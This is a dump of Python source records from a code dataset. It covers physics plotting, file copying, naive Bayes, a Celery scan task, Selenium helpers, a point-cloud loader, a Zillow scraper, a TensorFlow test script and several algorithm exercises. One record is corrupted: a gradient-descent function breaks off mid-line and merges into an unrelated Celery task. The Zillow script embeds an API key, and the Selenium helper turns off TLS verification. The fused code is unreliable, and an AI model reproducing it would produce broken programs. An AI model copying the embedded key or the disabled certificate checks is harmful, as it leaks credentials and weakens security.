= plt.scatter(Temperature, Heat_Capacity)\nR = plt.plot(Temp_List, (Ramanujan_Heat_Capacity_Coefficient*Temp_List)-2, 'r-')\nplt.title('Ramanujans Approximation for Heat Capacity (C/k) vs Temperature (kT/$\\eta$)')\nplt.xlabel('Temperature (kT/$\\eta$)')\nplt.ylabel('Heat Capacity (C/k)')\nplt.legend(['Heat capacity from Ramanujan approximation','Heat capacity from unrestricted partitions'])\nplt.savefig('Ramanujan_T_vs_Cv.pdf')\n\nprint(\"Ramanujan approximation for q=10:\", Ramanujan_Approximation[10])\nprint(\"Actual value for q=10:\", Partitions[10])\nprint(\"Ramanujan approximation for q=100:\", Ramanujan_Approximation[100])\nprint(\"Actual value for q=100:\", Partitions[100])\nRamanujan_Approximation = [1]\nfor i in range(1,len(Energy)):\n    Ramanujan_Approximation.append((np.exp(np.pi*np.sqrt(2*i/3)))/(4*np.sqrt(3)*i))\n","sub_path":"PHYS_431/Finding_Plotting_S_T_Cv.py","file_name":"Finding_Plotting_S_T_Cv.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"440592478","text":"import os\nfrom multiprocessing import Pool\n\ndef copyFileTask(name,args):\n    \"\"\"完成copy一个文件的功能\"\"\"\n    print(name)\n    fr=open(oldFileName+\"/\"+name)\n    fw=open(newFileName+\"/\"+name,\"w\")\n    print(\"--------\")\n    content= fr.read()\n    fw.write(content)\n\n    fr.close()\n    fw.close()\n\ndef main():\n    #0.获取用户copy的文件夹的名字\n    oldFileName=input(\"请输入copy的文件夹名字\")\n    #1.创建一个文件夹\n    newFileName=oldFileName+\"-副本\"\n    # os.mkdir(\"%s-副本\"%oldFileName)\n    os.mkdir(newFileName)\n    #2.获取old文件夹中所有的文件名字\n    fileName=os.listdir(oldFileName)\n    #3.使用多进程的方式copy原文件夹中所有的文件到新的文件夹下\n    pool=Pool(5)\n\n    for name in fileName:\n        pool.apply_async(copyFileTask,args=(name,oldFileName,newFileName))#后面一定要写上“,”表示远祖否则无法传到进程里面\n \n    pool.close()\n    pool.join()\n\n\nif __name__==\"__main__\":\n    main()","sub_path":"01-learn/进阶/04-进程线程/01-进程/test/09-多进程拷贝文件.py","file_name":"09-多进程拷贝文件.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"525085471","text":"#! /usr/bin/env python\n#coding=utf-8\n\nfrom config import *\nimport pymongo\n\ndb=pymongo.Connection(conf.get('proxy', 'db')).proxy\ndef getHttpProxy(id):\n\tif id<0: return conf.get('proxy', 'proxy'+str(id))\n\telse: \n\t\titem=db.http.find_one(id)\n\t\treturn None if item is None else item['proxy']\n\ndef getHttpsProxy(id):\n\tif id<0: return conf.get('proxy', 'proxy'+str(id))\n\telse: \n\t\titem=db.https.find_one(id)\n\t\treturn None if item is None else item['proxy']\n\nif __name__=='__main__':\n\tprint(getHttpProxy(1))\n","sub_path":"proxydao.py","file_name":"proxydao.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"157570730","text":"\n\ndef train(X_train,Y_train):\n\tsize=X_train.shape[0]\n\tcount1=0\n\tcount0=0\n\tcol=X_train.shape[1]\n\tp1=[-1 for i in range(col)]\n\tp2=[-1 for i in range(col)]\n\tp3=[-1 for i in range(col)]\n\tp4=[-1 for i in range(col)]\n\tfor i in range(size):\n\t\tif Y_train.iloc[i]==1:\n\t\t\tcount1+=1\n\t\telse:\n\t\t\tcount0+=1\n\tmp0=count0/size\n\tmp1=count1/size\n\tfor j in range(col):\n\t\tv0y0=0\n\t\tv0y1=0\n\t\tv1y0=0\n\t\tv1y1=0\n\t\tfor k in range(size):\n\t\t\tif Y_train.iloc[k]==0 and X_train.iloc[k][j]==0:\n\t\t\t\tv0y0+=1\n\t\t\tif Y_train.iloc[k]==1 and X_train.iloc[k][j]==0:\n\t\t\t\tv0y1+=1\n\t\t\tif Y_train.iloc[k]==0 and X_train.iloc[k][j]==1:\n\t\t\t\tv1y0+=1\n\t\t\tif Y_train.iloc[k]==1 and X_train.iloc[k][j]==1:\n\t\t\t\tv1y1+=1\n\t\tp1[j]=v0y0/count0\n\t\tp2[j]=v0y1/count1\n\t\tp3[j]=v1y0/count0\n\t\tp4[j]=v1y1/count1\n\n\t\n\treturn mp0,mp1,p1,p2,p3,p4\n\ndef testing(X_test,Y_test,mp0,mp1,p1,p2,p3,p4):\n\ttruep=0\n\tfalsep=0\n\tfalsen=0\n\n\tcount=0\n\n\tsize=X_test.shape[0]\n\tfor i in range(X_test.shape[0]):\n\t\tcr=X_test.iloc[i]\n\t\ty=Y_test.iloc[i]\n\t\tprod1=1\n\t\tprod2=1\n\t\tfor j in range(len(cr)):\n\t\t\tif cr[j]==0:\n\t\t\t\tprod1=prod1*p1[j]\n\t\t\t\tprod2=prod2*p2[j]\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tprod1=prod1*p3[j]\n\t\t\t\tprod2=prod2*p4[j]\n\t\t\t\t\n\n\t\tprediction=1\n\t\n\t\tif(prod1>prod2):\n\t\t\tprediction=0\n\n\t\tif(prediction==Y_test.iloc[i]):\n\t\t\tcount+=1\n\t\n\treturn (count/size)\n\n\n\n\n\n\n\n\n","sub_path":"Lab3/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"513507039","text":"\nimport numpy as np\ndef grdescent(func,w0,stepsize,maxiter,tolerance=1e-02):\n# INPUT:\n# func function to minimize\n# w_trained = initial weight vector\n# stepsize = initial gradient descent stepsize\n# tolerance = if norm(gradient)0:\n\t\tfor task in tasks:\n\t\t\tmember_id = task.member_id\n\t\t\tmember = Member.objects.get(id=member_id)\n\t\t\tqer = Queryer.objects.get(constom=member)\n\t\t\tif not qer.is_busy:\n\t\t\t\ttry:\n\t\t\t\t\tsrcfile_id = task.srcfile_id\n\t\t\t\t\tsrcfile = SourceFile.objects.get(id=srcfile_id)\n\t\t\t\t\tselect = task.select\n\t\t\t\t\tip = task.ip\n\t\t\t\t\tusername = task.username\n\t\t\t\t\tif task.modal:\n\t\t\t\t\t\tmodal = json.loads(task.modal)\n\t\t\t\t\telse:\n\t\t\t\t\t\tmodal = ''\n\t\t\t\t\tif select in ['sjpl3', 'tyhx3', 'xdhx3', 'TelCheck', 'IdPhoto', 'TelStatus', 'TelPeriod']:\n\t\t\t\t\t\tif select in ['TelCheck', 'IdPhoto', 'TelStatus', 'TelPeriod']:\n\t\t\t\t\t\t\tmodal = select\n\t\t\t\t\t\tresult = for_hx.delay(srcfile, member, select, ip, username, modal)\n\t\t\t\t\telse:\n\t\t\t\t\t\tresult = for_ice.delay(srcfile, member, select, ip, username, modal)\n\t\t\t\t\tqer.is_busy = True\n\t\t\t\t\tqer.do_on_file = os.path.basename(str(srcfile))\n\t\t\t\t\tqer.end_match = timezone.now()\n\t\t\t\t\tqer.save()\n\t\t\t\t\tmember.taskid = result.id\n\t\t\t\t\tmember.save()\n\t\t\t\texcept Exception:\n\t\t\t\t\tqer.is_busy = False\n\t\t\t\t\tqer.end_match = timezone.now()\n\t\t\t\t\tqer.save()\n\t\t\t\t\ttask.delete()\n\t\t\t\t\terrlog.error('扫描任务失败:'+traceback.format_exc())\n\t\t\t\t\treturn 'error!'\n\t\t\t\ttask.delete()\n\t\t\t\treturn 'add task to celery'\n\treturn \"no task\"\n\n\n\t\n\n\n","sub_path":"tags/DTS/Mapping_celery/Mapping/analyse/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"532189032","text":"import logging\nimport requests\nfrom src import WebDriverWait, EC, By\nimport time\n\nclass Operations(object):\n \n    def __init__ (self, driver):\n        self.driver = driver\n \n    def check_url(self, url):\n        \"\"\"\n        This function is used to check if the given link is broken or not.It simply makes a http call and checks response\n        :param url: link which you want to check\n        :return: True if response is 200 else False\n        \"\"\"\n        try:\n            request = requests.get(url, verify=False)\n            if request.status_code == 200:\n                return True\n            else:\n                return False\n        except Exception as e:\n            print(e)\n            return False\n \n    def get_element(self, element_data):\n        try:\n            return WebDriverWait(self.driver, 3000).until(\n                EC.presence_of_element_located((By.XPATH, element_data)))\n        except Exception:\n            logging.error(\"Element not found\")\n\n    def full_page_screenshot(self, image_name=None):\n        try:\n            if not image_name:\n                image_name = int(round(time.time() * 1000))\n            self.driver.get_screenshot_as_file(\"./tmp/{}.png\".format(image_name))\n        except Exception as e:\n            logging.exception(e)\n    ","sub_path":"src/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"513527442","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), '../../utils'))\n\nimport h5py, random\nimport numpy as np\nfrom tqdm import tqdm\nfrom base_loader import Base_Loader\nfrom cloud_util import *\nimport time\n\nclass PCD_Loader(Base_Loader):\n    def __init__(self, dir_name, dataset_model, dataset_size):\n        super(PCD_Loader, self).__init__(dir_name, dataset_model, dataset_size)\n\n    def load_hdf5(self):\n        path = self.find_h5py_filenames(self.dir)[0]\n        dir_path = self.dir+\"/\"+path\n        self.hdf5_file = h5py.File(dir_path, \"r\")\n\n        print(\"Start loading datasets !!\")\n        for n in tqdm(range(0, self.dataset_size)):\n            pcl_data = self.hdf5_file[\"data_\" + str(n + 1)]['pcl'][()]\n            pose_data = self.hdf5_file[\"data_\" + str(n + 1)]['pose'][()]\n            pose_data = self.conv_quat2mat(pose_data)\n            self.x_data.append(pcl_data)\n            self.y_data.append(pose_data)\n\n    def get_pcd_data(self, index):\n        pcd_data = self.x_data[index]\n        x_data, pcd_offset = getNormalizedPcd(pcd_data, 1024)\n        y_data = self.y_data[index]\n        y_pos = y_data[0:3] - pcd_offset\n        y_rot = y_data[3:]\n        y_data = np.concatenate([y_pos, y_rot])\n\n        return x_data, y_data\n\n\n    def get_voxel_data(self, index, resolution):\n        channel = 1\n        pcd_data = self.x_data[index]\n        pose_data = self.y_data[index]\n        min_p, max_p, diff_max = doMinMax(pcd_data)\n        voxel = np.zeros((resolution, resolution, resolution), dtype=\"float32\")\n        binary_data = runMakeVoxelBinary(pcd_data, resolution)\n        voxel = binary_data.reshape(resolution, resolution, resolution)\n        voxel = voxel[np.newaxis, :]\n\n        norm_pose_data = np.zeros((12), dtype=\"float32\")\n        norm_pose_data[0] = (pose_data[0] - min_p[0]) / diff_max\n        norm_pose_data[1] = (pose_data[1] - min_p[1]) / diff_max\n        norm_pose_data[2] = (pose_data[2] - min_p[2]) / diff_max\n        norm_pose_data[3] = pose_data[3]\n        norm_pose_data[4] = pose_data[4]\n        norm_pose_data[5] = pose_data[5]\n        norm_pose_data[6] = pose_data[6]\n        norm_pose_data[7] = pose_data[7]\n        norm_pose_data[8] = pose_data[8]\n        norm_pose_data[9] = pose_data[9]\n        norm_pose_data[10] = pose_data[10]\n        norm_pose_data[11] = pose_data[11]\n\n        return voxel, norm_pose_data\n\n    def get_voxel(self, index):\n        voxel_data = self.x_data[index]\n        pose_data = self.y_data[index]\n        print(pose_data)\n        return voxel_data, pose_data\n\n\nif __name__ == \"__main__\":\n    loader = PCD_Loader(\"../../datasets/\", \"HV7\", 200)\n    loader.load_hdf5()\n\n    size = loader.dataset_size\n    op_time = 0.0\n    for i in range(size):\n        print(i)\n        s_time = time.time()\n        voxel, pose = loader.get_voxel_data(i, 50)\n        e_time = time.time()\n        lap_time = e_time - s_time\n        op_time += lap_time\n \n\n\n","sub_path":"data/pcd_loader.py","file_name":"pcd_loader.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"204995760","text":"# encoding: UTF-8\n\n# 默认空值\nEMPTY_STRING = ''\nEMPTY_UNICODE = u''\nEMPTY_INT = 0\nEMPTY_FLOAT = 0.0\n\nSAVE_DATA = u'保存数据'\n\nSTOCK_SYMBOL = u'代码'\nSTOCK_NAME = u'名称'\nLAST_PRICE = u'最新价'\nPRE_CLOSE_PRICE = u'昨收盘'\nVOLUME = u'成交量'\nOPEN_PRICE = u'开盘价'\nHIGH_PRICE = u'最高价'\nLOW_PRICE = u'最低价'\nCHANGEPER_PRICE = u'涨幅'\nTIME = u'时间'\nMSG = u'信息'\nREMOVE_CODE =u'删除代码'\n\nGATEWAY = u'接口'\nCONTENT = u'内容'\n\nERROR_CODE = u'错误代码'\nERROR_MESSAGE = u'错误信息'\n\n\n\nACCOUNT_ID = u'账户编号'\nPRE_BALANCE = u'昨净值'\nBALANCE = u'净值'\nAVAILABLE = u'可用'\nCOMMISSION = u'手续费'\nMARGIN = u'保证金'\nCLOSE_PROFIT = u'平仓盈亏'\n\nTRADING = u'交易'\nPRICE_TYPE = u'价格类型'\nEXCHANGE = u'交易所'\nCURRENCY = u'货币'\nPRODUCT_CLASS = u'产品类型'\nLAST = u'最新'\nSEND_ORDER = u'发单'\nCANCEL_ALL = u'全撤'\nVT_SYMBOL = u'vt系统代码'\nCONTRACT_SIZE = u'合约大小'\nPRICE_TICK = u'最小价格变动'\nSTRIKE_PRICE = u'行权价'\nUNDERLYING_SYMBOL = u'标的代码'\nOPTION_TYPE = u'期权类型'\n\nREFRESH = u'刷新'\nSEARCH = u'查询'\nCONTRACT_SEARCH = u'合约查询'\n\nMARKET_DATA = u'行情'\nLOG = u'日志'\nERROR = u'错误'\nTRADE = u'成交'\nORDER = u'委托'\nPOSITION = u'持仓'\nACCOUNT = u'账户'\n\nSYSTEM = u'系统'\nCONNECT_DATABASE = u'连接数据库'\nEXIT = u'退出'\nAPPLICATION = u'功能'\nDATA_RECORDER = u'行情记录'\nRISK_MANAGER = u'风控管理'\n\nSTRATEGY = u'策略'\nCTA_STRATEGY = u'CTA策略'\n\nHELP = u'帮助'\nRESTORE = u'还原窗口'\nABOUT = u'关于'\nTEST = u'测试'\nCONNECT = u'连接'\nEDIT_SETTING = u'编辑配置'\nLOAD = u'读取'\nSAVE = u'保存'\n\nCPU_MEMORY_INFO = u'CPU使用率:{cpu}% 内存使用率:{memory}%'\nCONFIRM_EXIT = u'确认退出?'\n\nGATEWAY_NOT_EXIST = u'接口不存在:{gateway}'\nDATABASE_CONNECTING_COMPLETED = u'MongoDB连接成功'\nDATABASE_CONNECTING_FAILED = u'MongoDB连接失败'\nDATA_INSERT_FAILED = u'数据插入失败,MongoDB没有连接'\nDATA_QUERY_FAILED = u'数据查询失败,MongoDB没有连接'\nDATA_UPDATE_FAILED = u'数据更新失败,MongoDB没有连接'\n","sub_path":"ccText.py","file_name":"ccText.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"123873469","text":"'''\r\nCreated on 26 mar. 2020\r\n\r\n@author: George\r\n'''\r\nimport math\r\n\r\ndef dist(i,j): # i si j sunt puncte de forma (x,y)\r\n    xi = i[0]\r\n    yi = i[1]\r\n    \r\n    xj = j[0]\r\n    yj = j[1]\r\n    \r\n    dx = (xi - xj)**2\r\n    dy = (yi - yj)**2 # a nu se inelege ca ar fi derivate\r\n    dist = math.sqrt( dx + dy )\r\n    return dist\r\n# !!! DIST MUST BE THE SAME FUNCTION USED IN THE MAIN MODULE.\r\n# ELSE IT MAKES NO SENSE TO CREATE THE ADJACENCE MATRIX AND CALCULATE THE DISTANCE WITH DIFFERENT METHODS !!!\r\n\r\ndef parse(fileName): # safer method to parse file input to dict of label : (x,y) tuples\r\n    nodes = {}\r\n    \r\n    f = open(fileName, \"r\")\r\n    while True:\r\n        \r\n        line = f.readline()\r\n        parts = line.split(\" \")\r\n        \r\n        if len(parts) == 3:\r\n            label = int(parts[0]) - 1\r\n            x = float(parts[1])\r\n            y = float(parts[2])\r\n            nodes[label] = (x,y)\r\n        else:\r\n            break\r\n    return nodes\r\n\r\n\r\n\r\ndef parseBerlin(fileName, dist_callback):\r\n    f = open(fileName, \"r\")\r\n    \r\n    points = []\r\n    \r\n    while True:\r\n        \r\n        line = f.readline()\r\n        parts = line.split(\" \")\r\n        \r\n        if len(parts) == 3:\r\n            label = int(parts[0]) - 1\r\n            x = float(parts[1])\r\n            y = float(parts[2])\r\n            point = (label,x,y)\r\n            points.append(point)\r\n        else:\r\n            break\r\n    \r\n    #N = len(points) # 52\r\n    \r\n    \r\n    A = []\r\n    for pointi in points:\r\n        row = []\r\n        for pointj in points:\r\n            ij = dist_callback(pointi,pointj) # distance function is used here\r\n            row.append(ij)\r\n        A.append(row)\r\n    \r\n    return A # adjacence matrix\r\n","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"286938971","text":"class Solution(object):\n    def minimumTotal(self, triangle):\n        \"\"\"\n        :type triangle: List[List[int]]\n        :rtype: int\n        \"\"\"\n        if not triangle:\n            return 0\n        m = len(triangle) + 1\n        n = len(triangle[-1]) + 1\n        A = [[float('inf') for _ in range(n)] for _ in range(m)]\n        A[0][0] = 0\n        for i in range(1, m):\n            for j in range(1, len(triango[i-1])+1):\n                A[i][j] = min(A[i-1][j], A[i-1][j-1]) + triangle[i-1][j-1]\n\n        return min(A[-1])\n\ntriango = [\n    [2],\n    [3,4],\n    [6,5,7],\n    [4,1,8,3]\n]\n\nS = Solution()\nprint(S.minimumTotal(triango))","sub_path":"120 - Triangle.py","file_name":"120 - Triangle.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"551716352","text":"import urllib2\nimport xml \nimport os\nimport xml.etree.ElementTree as etree\n\nzips = file('zipcodes.txt', 'r')\nurl = 'http://www.zillow.com/webservice/GetDemographics.htm?zws-id=X1-ZWz1b260i9k4jv_7j3qs&zip='\noutputName = 'output.txt'\n# os.remove(output.txt)\noutput = open(outputName, 'w')\noutput.write('')\n\nfor line in zips:\n\tfile = urllib2.urlopen(url + line)\n\ttree = etree.parse(file)\n\tnotags = etree.tostring(tree, encoding='utf8', method='text')\n\tprint(notags)\n\t# for line in file:\n\t# \t#data = file.readline()\n\t# \tprint line\n\t# \toutput.write(line)\n\toutput.write(notags)\n\toutput.write(\"\\n\")\nfile.close()\noutput.close()\nneighborhoods.close()\n","sub_path":"Homework/11-06-2014/zillowDemographics.py","file_name":"zillowDemographics.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"509882623","text":"# -*- coding: UTF-8 -*-\n# Created by thpffcj on 2019-03-28.\n\nfrom __future__ import print_function\n\nimport os\nimport time\nfrom datetime import timedelta\n\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn import metrics\n\nfrom preprocess128 import preprocess\nfrom cnews_loader_withoutSeqLens import batch_iter\nfrom evaluatewithws import evaluatews\n\nfrom selfattention_lstm_3 import TRNNConfig,TextRNN\n\nsource_path = '../source/zj2ss'\ntrainpath = source_path + '/train-ws.txt'\nvalidatepath = source_path + '/validate-ws.txt'\n#####\ntest_path = '../source/zj2ss'\ntestpath_name = test_path + '/test-name.txt'\ntestpath = test_path + '/test-noname.txt'\nmodelpath = '../source/zj2ss/2014model_size128.model'\n\nmodel_save = '../result/model_files/zj2ss'\nsave_dir = model_save + '/HNS_checkpoints/128-465-ws-50-70'\nsave_path = os.path.join(save_dir, 'best_validation_selfattention_lstm_3')  # 最佳验证结果保存路径\ntensorboard_dir = model_save + '/HNS_tensorboard/128-465-ws-50-70'\n\np = preprocess(modelpath)\np.load_models()\np.setinputdatapath(trainpath)\np.settestdatapath(testpath)\np.setvalidatedatapath(validatepath)\n\n\ndef get_time_dif(start_time):\n    \"\"\"获取已使用时间\"\"\"\n    end_time = time.time()\n    time_dif = end_time - start_time\n    return timedelta(seconds=int(round(time_dif)))\n\n\ndef feed_data(x1_batch, x2_batch, y_batch, keep_prob):\n    feed_dict = {\n        model.input_x_1: x1_batch,\n        model.input_x_2: x2_batch,\n        model.input_y: y_batch,\n        model.keep_prob: keep_prob,\n    }\n    return feed_dict\n\n\ndef evaluate(sess, x1_, x2_, y_):\n    \"\"\"评估在某一数据上的准确率和损失\"\"\"\n    data_len = len(x1_)\n    batch_eval = batch_iter(x1_, x2_, y_, 128)\n    total_loss = 0.0\n    total_acc = 0.0\n    for x1_batch, x2_batch, y_batch in batch_eval:\n        batch_len = len(x1_batch)\n        feed_dict = feed_data(x1_batch, x2_batch, y_batch, 1.0)\n        loss, acc = sess.run([model.loss, model.acc], feed_dict=feed_dict)\n        total_loss += loss * batch_len\n        total_acc += acc * batch_len\n\n    return total_loss / data_len, total_acc / data_len\n\n\ndef test():\n    print(\"Loading test data...\")\n    start_time = time.time()\n    x1_test, x2_test, y_test = p.setinputdata(model.config.seq_length_1,\n                                              model.config.seq_length_2, flag=2)\n\n    session = tf.Session()\n    session.run(tf.global_variables_initializer())\n    saver = tf.train.Saver()\n    saver.restore(sess=session, save_path=save_path)  # 读取保存的模型\n\n    print('Testing...')\n    loss_test, acc_test = evaluate(session, x1_test, x2_test, y_test)\n    msg = 'Test Loss: {0:>6.2}, Test Acc: {1:>7.2%}'\n    print(msg.format(loss_test, acc_test))\n\n    batch_size = 128\n    data_len = len(x1_test)\n    num_batch = int((data_len - 1) / batch_size) + 1\n\n    y_test_cls = np.argmax(y_test, 1)\n    y_pred_cls = np.zeros(shape=len(x1_test), dtype=np.int32)  # 保存预测结果\n    for i in range(num_batch):  # 逐批次处理\n        start_id = i * batch_size\n        end_id = min((i + 1) * batch_size, data_len)\n        feed_dict = {\n            model.input_x_1: x1_test[start_id:end_id],\n            model.input_x_2: x2_test[start_id:end_id],\n            model.keep_prob: 1.0  # 这个表示测试时不使用dropout对神经元过滤\n        }\n        # 将所有批次的预测结果都存放在y_pred_cls中\n        y_pred_cls[start_id:end_id] = session.run(model.y_pred_cls, feed_dict=feed_dict)\n\n    print(\"Precision, Recall and F1-Score...\")\n    print(metrics.classification_report(y_test_cls, y_pred_cls, digits=3))  # 直接计算准确率,召回率和f值\n\n    # 混淆矩阵\n    print(\"Confusion Matrix...\")\n    cm = metrics.confusion_matrix(y_test_cls, y_pred_cls)\n    print(cm)\n\n    time_dif = get_time_dif(start_time)\n    print(\"Time usage:\", time_dif)\n    return y_test_cls, y_pred_cls\n\n\nconfig = TRNNConfig()\nmodel = TextRNN(config)\n\ny_test_cls, y_pred_cls = test()\nevaluatews(y_pre_cls=y_pred_cls, y_test_cls=y_test_cls, testdatapath=testpath_name)","sub_path":"analysis-of-legal-documents/project/test/run_zj_test_selfattention_lstm_3.py","file_name":"run_zj_test_selfattention_lstm_3.py","file_ext":"py","file_size_in_byte":4027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"42016144","text":"\"\"\"\nGiven an array chocolate of n non-negative integers, where the values are sweetness levels of the chocolate.\nYou are also given a value k which denotes the number of friends you will share this chocolate with.\nYour friends are greedy so they will always take the highest sweetness chunk.\nFind out what is the maximum sweetness level you could get.\n\ntldr: Split the array into k non-empty continuous subarrays.\nWrite an algorithm to maximize the minimum sum among these k subarrays.\n\nExample:\n\nInput: chocolate = [6, 3, 2, 8, 7, 5], k = 3\nOutput: 9\nExplanation:\nThe values in array are sweetness level in each chunk of chocolate. Since k = 3, so you have to divide this array in 3 pieces,\nsuch that you would get maximum out of the minimum sweetness level. So, you should divide this array in\n[6, 3] -> 6 + 3 = 9\n[2, 8] -> 2 + 8 = 10\n[7, 5] -> 7 + 5 = 12\nYour other two friends will take the sweetest chunk, so they will take 12 and 10.\nThe maximum sweetness level you could get is 9.\n\nuse the binary search method:\nsearch for the maximum viable sweetness level\nstart from min(chocolate) to sum(chocolate)\ncheck if we can split it by k parts\nkeep going until we can't\nn*log(sum(choc) - min(choc))\n\nFollow-up: can we optimize the split function from O(N)? Yes - cumulative sum and binary search makes it O(k*logN)\n\"\"\"\n\n\ndef can_split_into_n(chocs, target, k):\n    count = 0\n    running = 0\n    for c in chocs:\n        running += c\n        if running >= target:\n            running = 0\n            count += 1\n    return count >= k\n\n\ndef bsearch_right(start, end, arr, target):\n    best = None\n    while start <= end:\n        mid = start + (end - start) // 2\n        if arr[mid] == target:\n            return mid\n        elif arr[mid] > target:\n            best = mid\n            end = mid - 1\n        else:\n            start = mid + 1\n    return best\n\n\ndef can_split_into_n_bsearch(cum_choc, target, k):\n    start = 0\n    i = 0\n    for _ in range(k):\n        start += target\n        idx = bsearch_right(i, len(cum_choc) - 1, cum_choc, start)\n        if not idx:\n            return False\n        i = idx + 1\n        start = cum_choc[idx]\n    return True\n\n\ndef cum_sum(arr):\n    res = []\n    curr = 0\n    for a in arr:\n        curr += a\n        res.append(curr)\n    return res\n\n\ndef fastn_bsearch_choc_sweetness(chocs, k):\n    start = min(chocs)\n    end = sum(chocs)\n    best = min(chocs)\n    cum_chocs = cum_sum(chocs)\n    while start <= end:\n        mid = start + (end - start) // 2\n        if can_split_into_n_bsearch(cum_chocs, mid, k):\n            best = mid\n            start = mid + 1\n        else:\n            end = mid - 1\n    return best\n\n\ndef bsearch_choc_sweetness(chocs, k):\n    start = min(chocs)\n    end = sum(chocs)\n    best = min(chocs)\n    while start <= end:\n        mid = start + (end - start) // 2\n        if can_split_into_n(chocs, mid, k):\n            best = mid\n            start = mid + 1\n        else:\n            end = mid - 1\n    return best\n\n\nif __name__ == \"__main__\":\n\n    chocolate = [6, 3, 2, 8, 7, 5]\n    k = 3\n    exp = 9\n    assert bsearch_choc_sweetness(chocolate, k) == exp\n    assert fastn_bsearch_choc_sweetness(chocolate, k) == exp\n","sub_path":"lc_discuss/old/batch_3/faster_choc_sweetness.py","file_name":"faster_choc_sweetness.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"264972656","text":"ans = 0\n\nwhile True:\n    try:\n        line = input()\n    except EOFError:\n        break\n\n    lhs, rhs = line.split('=')\n\n    lhs_eval = eval(lhs)\n    if '?' in rhs: continue\n    rhs_eval = eval(rhs)\n    if lhs_eval == rhs_eval: ans += 1\n\nprint(ans)","sub_path":"UVa Online Judge/11878.py","file_name":"11878.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"110378408","text":"# author Qiyi Shan\n# Date 3.16.2017\n\nfrom Homework.exprtree import Var, Cond, Oper, Value, Nega, Func\nfrom Homework.newsplit import new_split_iter, NegativeSign\n\n__priority_list = ['=', 'and', 'or', '?', '< > <= >= == !=', '+ -', '* / %', NegativeSign, '**']\n__to_right_direction = {'=': False, 'and': True, 'or': True, '?': False, '< > <= >= == !=': True, '+ -': True,\n\t\t\t\t\t\t'* / %': True, NegativeSign: True, '**': False}\n\n\ndef tree_assign(iterator):\n\treturn to_expr_tree(iterator)\n\n\ndef to_expr_tree(expr):\n\tif type(expr) == str:\n\t\texpr = new_split_iter(expr)\n\texpr = list(expr)[0:-1]\n\treturn __to_tree(expr)\n\n\ndef __split_args(expr, pos):\n\texprs = [[]]\n\twhile pos < len(expr):\n\t\tif expr[pos] == ',':\n\t\t\texprs.append([])\n\t\telse:\n\t\t\texprs[-1].append(expr[pos])\n\t\tpos += 1\n\treturn [__to_tree(e) for e in exprs]\n\n\ndef __to_tree(expr):\n\t\"\"\"Recursively convert expression to tree\"\"\"\n\tif len(expr) == 1:\n\t\tif expr[0].isnumeric():\n\t\t\treturn Value(expr[0])\n\t\telse:\n\t\t\treturn Var(expr[0])\n\n\tfor operator in __priority_list:\n\t\tindex_order = range(len(expr) - 1, -1, -1) if __to_right_direction[operator] else range(len(expr))\n\t\tfor i in index_order:\n\t\t\tif expr[i] in operator.split(' ') and not __in_brackets(expr, i):\n\t\t\t\tif expr[i] == '?':\n\t\t\t\t\tcolon_pos = i + expr[i:].index(':')\n\t\t\t\t\treturn Cond(__to_tree(expr[:i]), __to_tree(expr[i + 1:colon_pos]), __to_tree(expr[colon_pos + 1:]))\n\t\t\t\telif expr[i] is NegativeSign:\n\t\t\t\t\treturn Nega(__to_tree(expr[i + 1:]))\n\t\t\t\telse:\n\t\t\t\t\treturn Oper(__to_tree(expr[:i]), expr[i], __to_tree(expr[i + 1:]))\n\n\tfor pos, val in enumerate(expr[:-1]):\n\t\tif val not in __priority_list and not val.isnumeric() and expr[pos + 1] == '(' and not __in_brackets(expr, pos):\n\t\t\treturn Func(val, __split_args(expr[pos + 2:pos + expr[pos:].index(')')], pos))\n\tif expr[0] == '(':\n\t\treturn __to_tree(expr[1:-1])\n\n\traise NotImplementedError(str(expr) + \" not implemented\")\n\n\ndef __in_brackets(expr, pos):\n\t\"\"\"Test if an operator is included in brackets\"\"\"\n\treturn expr[:pos].count('(') > expr[:pos].count(')')\n\n\nif __name__ == \"__main__\":\n\tprint(to_expr_tree('func(4,5)'))\n\tprint(to_expr_tree('func(1*5) + 6'))\n","sub_path":"infixtotree.py","file_name":"infixtotree.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
